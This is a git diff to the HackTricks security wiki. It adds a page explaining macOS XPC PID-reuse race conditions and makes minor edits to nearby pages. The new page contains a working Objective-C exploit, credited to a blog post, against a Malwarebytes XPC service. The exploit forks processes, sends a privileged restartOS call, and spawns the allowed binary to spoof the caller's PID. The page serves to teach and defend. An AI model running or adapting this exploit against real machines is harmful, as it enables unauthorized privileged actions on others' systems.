diff --git a/.gitbook/assets/image (4) (1) (4).png b/.gitbook/assets/image (4) (1) (4).png new file mode 100644 index 00000000..955989ee Binary files /dev/null and b/.gitbook/assets/image (4) (1) (4).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index 955989ee..0d4cd8ba 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 0d4cd8ba..743e51c3 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 7848b05e..84125f1c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -144,6 +144,7 @@ * [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-bundles.md) * [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md) * [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md) + * [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md) * [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md) * [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md) * [Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md) diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md new file mode 100644 index 00000000..4ad90577 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md @@ -0,0 +1,166 @@ +# macOS PID Reuse + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## PID Reuse + +When a macOS **XPC service** is checking the called process based on the **PID** and not on the **audit token**, it's vulnerable to PID reuse attack. This attack is based on a **race condition** where an **exploit** is going to **send messages to the XPC** service **abusing** the functionality and just **after** that, executing **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** with the **allowed** binary. + +This function will make the **allowed binary own the PID** but the **malicious XPC message would have been sent** just before. So, if the **XPC** service **use** the **PID** to **authenticate** the sender and checks it **AFTER** the execution of **`posix_spawn`**, it will think it comes from an **authorized** process. + + + +### Exploit example + +If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\ +Like for example in this image (taken from the reference): + +
+ +Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit: + +* One that **generates several forks** +* **Each fork** will **send** the **payload** to the XPC service while executing **`posix_spawn`** just after sending the message. + +{% hint style="danger" %} +For the exploit to work it's important to export export OBJC\_DISABLE\_INITIALIZE\_FORK\_SAFETY=YES or to put in th exploit: + +```objectivec +asm(".section __DATA,__objc_fork_ok\n" +"empty:\n" +".no_dead_strip empty\n"); +``` +{% endhint %} + +```objectivec +// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/ + +#import +#include +#include + +#define RACE_COUNT 32 +#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon" +#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon" + +// allow fork() between exec() +asm(".section __DATA,__objc_fork_ok\n" +"empty:\n" +".no_dead_strip empty\n"); + +extern char **environ; + +// defining necessary protocols +@protocol ProtectionService +- (void)startDatabaseUpdate; +- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1; +- (void)uninstallProduct; +- (void)installProductUpdate; +- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2; +- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1; +- (void)triggerLicenseRelatedChecks; +- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2; +- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3; +- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2; +- (void)restartOS; +- (void)resumeScanJob; +- (void)pauseScanJob; +- (void)stopScanJob; +- (void)startScanJob; +- (void)disposeOperationBy:(NSUUID *)arg1; +- (void)subscribeTo:(long long)arg1; +- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2; +@end + +void child() { + + // send the XPC messages + NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)]; + NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged]; + xpcConnection.remoteObjectInterface = remoteInterface; + + [xpcConnection resume]; + [xpcConnection.remoteObjectProxy restartOS]; + + char target_binary[] = BINARY; + char *target_argv[] = {target_binary, NULL}; + posix_spawnattr_t attr; + posix_spawnattr_init(&attr); + short flags; + posix_spawnattr_getflags(&attr, &flags); + flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED); + posix_spawnattr_setflags(&attr, flags); + posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ); +} + +bool create_nstasks() { + + NSString *exec = [[NSBundle mainBundle] executablePath]; + NSTask *processes[RACE_COUNT]; + + for (int i = 0; i < RACE_COUNT; i++) { + processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]]; + } + + int i = 0; + struct timespec ts = { + .tv_sec = 0, + .tv_nsec = 500 * 1000000, + }; + + nanosleep(&ts, NULL); + if (++i > 4) { + for (int i = 0; i < RACE_COUNT; i++) { + [processes[i] terminate]; + } + return false; + } + + return true; +} + +int main(int argc, const char * argv[]) { + + if(argc > 1) { + // called from the NSTasks + child(); + + } else { + NSLog(@"Starting the race"); + create_nstasks(); + } + + return 0; +}obj +``` + +## Refereces + +* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/) + + + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md index 8c996adf..69f00424 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md @@ -194,15 +194,7 @@ This means that at the end of this process, the permissions declared inside `com There are different scopes to indicate who can access a right. Some of them are defined in [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity\_authorization/lib/AuthorizationDB.h) (you can find [all of them in here](https://www.dssw.co.uk/reference/authorization-rights/)), but as summary: -| Name | Value | Description | -| ------------------------------------------- | -------------------------- | ---------------------------------------------------------------------- | -| kAuthorizationRuleClassAllow | allow | Anyone | -| kAuthorizationRuleClassDeny | deny | Nobody | -| kAuthorizationRuleIsAdmin | is-admin | Current user needs to be an admin (inside admin group) | -| kAuthorizationRuleAuthenticateAsSessionUser | authenticate-session-owner | Ask user to authenticate. | -| kAuthorizationRuleAuthenticateAsAdmin | authenticate-admin | Ask user to authenticate. He needs to be an admin (inside admin group) | -| kAuthorizationRightRule | rule | Specify rules | -| kAuthorizationComment | comment | Specify some extra comments on the right | +
NameValueDescription
kAuthorizationRuleClassAllowallowAnyone
kAuthorizationRuleClassDenydenyNobody
kAuthorizationRuleIsAdminis-adminCurrent user needs to be an admin (inside admin group)
kAuthorizationRuleAuthenticateAsSessionUserauthenticate-session-ownerAsk user to authenticate.
kAuthorizationRuleAuthenticateAsAdminauthenticate-adminAsk user to authenticate. He needs to be an admin (inside admin group)
kAuthorizationRightRuleruleSpecify rules
kAuthorizationCommentcommentSpecify some extra comments on the right
### Rights Verification diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md index b2637dde..3120ebfc 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md @@ -27,6 +27,12 @@ When a connection is stablished to an XPC service, the server will check if the 6. The **verification** must be **based** on the connecting **client’s audit token** **instead** of its process ID (**PID**) since the former prevents PID reuse attacks. * Developers rarely use the audit token API call since it’s **private**, so Apple could **change** at any time. Additionally, private API usage is not allowed in Mac App Store apps. +For more information about the PID reuse attack check: + +{% content-ref url="macos-pid-reuse.md" %} +[macos-pid-reuse.md](macos-pid-reuse.md) +{% endcontent-ref %} + ### Code Examples The server will implement this **verification** in a function called **`shouldAcceptNewConnection`**. diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md index d43ecb4d..aef27af8 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md @@ -127,7 +127,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY Or using [Mach-O View](https://sourceforge.net/projects/machoview/): -
+
## **Mach-O Load commands** diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md index 2f6a34b7..4d219b62 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md @@ -27,7 +27,7 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo In the Burp's builtin browser go to the **Burp extension** and enable it: -
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**